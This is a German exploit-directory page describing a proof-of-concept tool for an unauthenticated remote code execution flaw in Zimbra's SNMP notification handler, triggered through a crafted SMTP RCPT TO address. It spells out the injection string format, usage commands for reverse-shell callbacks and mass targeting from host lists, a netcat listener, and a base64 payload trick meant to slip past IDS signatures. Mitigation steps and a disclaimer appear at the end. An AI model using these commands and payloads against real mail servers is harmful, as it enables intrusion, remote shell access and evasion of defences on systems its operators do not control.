Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-73570 — Zimbra SNMP-Benachrichtigung OS-Command-Injection — Nicht authentifizierte RCE über SMTP-Exploit (PoC) | Kitploit
Tools/GitHubGitHub/gabrielunknown/cve-2026-73570
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHubgabrielunknown/cve-2026-73570

CVE-2026-73570

Zimbra SNMP-Benachrichtigung OS-Command-Injection — Nicht authentifizierte RCE über SMTP-Exploit (PoC)

Repository anzeigen
1vor 1 TagNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-73570 — Zimbra ZCS SNMP Notification RCE-Exploit (PoC)

Unauthenticated Remote Code Execution durch OS-Command-Injection im SNMP-Notification-Handler der Zimbra Collaboration Suite.


Übersicht

FeldWert
CVECVE-2026-73570
CVSS 3.18.9 HOCH — AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
CWECWE-78 — Unzureichende Neutralisierung spezieller Elemente in einem OS-Befehl
BetroffenZimbra ZCS < 10.1.20 (mit installiertem zimbra-snmp)
Behoben inZCS 10.1.20 — Juli 2026
CISA KEVHinzugefügt am 2026-08-21 (FCEB-Behebungsfrist: 2026-08-24)
Authentifizierung erforderlichKeine
Ausführung alszimbra-OS-Benutzer

Grundursache

Das optionale Paket zimbra-snmp enthält eine swatchdog-Regel, die /var/log/zimbra.log nach Zeilen durchsucht, die folgendem Muster entsprechen:

root@kitploit:~
Service status change: <NAME> changed from <STATE> to <STATE>

Bei einer Übereinstimmung übergibt swatchdog das erfasste Feld <NAME> ohne jegliche Bereinigung direkt an das SNMP-Notification-Shell-Skript.

Ein nicht authentifizierter Angreifer kann einen manipulierten Logeintrag injizieren, indem er einen speziell geformten SMTP-RCPT TO-Befehl sendet. Mithilfe eines quoted local-part gemäß RFC 5321 werden Shell-Metazeichen — z. B. $(...) — innerhalb von <NAME> eingebettet und ausgeführt, wenn swatchdog die resultierende Logzeile verarbeitet.


Voraussetzungen

Alle drei Bedingungen müssen auf dem Zielsystem erfüllt sein, damit die Schwachstelle ausnutzbar ist:

  • Das Paket zimbra-snmp ist installiert
  • SNMP-Notifications sind aktiviert (snmp_notify = true)
  • Der Dienst swatchdog läuft

Angriffsablauf

root@kitploit:~
Angreifer                          Zimbra MTA
   │                                  │
   │── TCP connect :25/:465/:587 ────►│
   │── EHLO mx-test.invalid ─────────►│
   │── MAIL FROM:<scanner@...> ──────►│
   │── RCPT TO:<"x: Service status    │
   │     change: localhost $(CMD)     │
   │     changed from stopped to      │
   │     running"@cve.invalid> ──────►│
   │                                  │── protokolliert RCPT-TO-Daten ──► /var/log/zimbra.log
   │                                  │                               │
   │                                  │                         swatchdog findet
   │                                  │                         Muster, extrahiert
   │                                  │                         $(CMD), führt aus
   │◄─────────── Shell-Callback ───────────────────────────────────────┘
  1. Verbindung zu Port 25 / 465 / 587 herstellen.
  2. Eine standardmäßige SMTP-Konversation mit dem präparierten RCPT TO senden.
  3. Zimbra protokolliert die Adressdaten unabhängig von Annahme/Ablehnung.
  4. swatchdog findet das Logmuster und extrahiert das injizierte $(CMD).
  5. Der SNMP-Handler führt CMD als zimbra-OS-Benutzer aus.

Exploit

Anforderungen

root@kitploit:~
cpan IO::Socket::SSL MIME::Base64 Digest::HMAC_MD5

Einzelnes Ziel

root@kitploit:~
perl zimbra-poc.pl -H mail.target.com -r <YOUR_IP> -R 4444

Zielliste

root@kitploit:~
perl zimbra-poc.pl -f targets.txt -r <YOUR_IP> -R 4444

targets.txt — ein Host pro Zeile, optional :port, Zeilen, die mit # beginnen, werden ignoriert:

root@kitploit:~
mail.example.com
mail.example.com:25
10.0.0.50:587
# ignorierter Kommentar

Alle Optionen

FlagLangStandardBeschreibung
-H--host—Einzelner Ziel-Hostname oder IP
-f--file—Datei mit Zielliste
-p--port587Standard-SMTP-Port
-r--rhost—Ihre IP für den Reverse-Shell-Callback
-R--rport4444Listener-Port
-t--timeout15Socket-Timeout in Sekunden
-S--sslausDirektes TLS (automatisch aktiviert auf Port 465)
-v--verboseausVollständigen SMTP-Dialog ausgeben
-L--logfile—Sitzungslog in Datei schreiben
-h--help—Hilfe anzeigen

Vollständiges Beispiel

root@kitploit:~
# Terminal 1 — Listener starten
nc -lvnp 4444

# Terminal 2 — Exploit ausführen
perl zimbra-poc.pl -H mail.target.com -r 10.10.10.1 -R 4444 -v

Payload-Technik

Der Reverse-Shell-Befehl wird vor der Injektion base64-kodiert:

root@kitploit:~
echo <b64>|base64 -d|bash

Dies verhindert, dass IDS/IPS Klartext-Signaturen wie /dev/tcp, bash -i oder nc -e erkennen. Der kodierte Block wird als $(...) innerhalb des quoted local-part von RCPT TO injiziert und löst serverseitig die Ausführung aus, wenn swatchdog den Logeintrag verarbeitet.


Gegenmaßnahmen

AktionDetail
PatchUpgrade auf Zimbra ZCS ≥ 10.1.20
SNMP-Notify deaktivierenzmprov mcf zimbraSnmpNotifyEnabled FALSE && zmconfigdctl restart
Paket entfernenapt remove zimbra-snmp / yum remove zimbra-snmp
Netzwerk-KontrollenEingehendes SMTP (25/465/587) auf vertrauenswürdige Relays beschränken, wo betrieblich machbar

Referenzen

  • NVD — CVE-2026-73570
  • Zimbra Security Advisories
  • CISA Known Exploited Vulnerabilities — CVE-2026-73570
  • CERT.pl advisory
  • BiuTrap/CVE-2026-73570

Haftungsausschluss

Dieser Proof-of-Concept wird ausschließlich für autorisierte Sicherheitstests, akademische Forschung und defensive Zwecke veröffentlicht.
Die Ausführung gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche schriftliche Testgenehmigung haben, ist illegal.
Der Autor übernimmt keinerlei Haftung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.


Tool herunterladen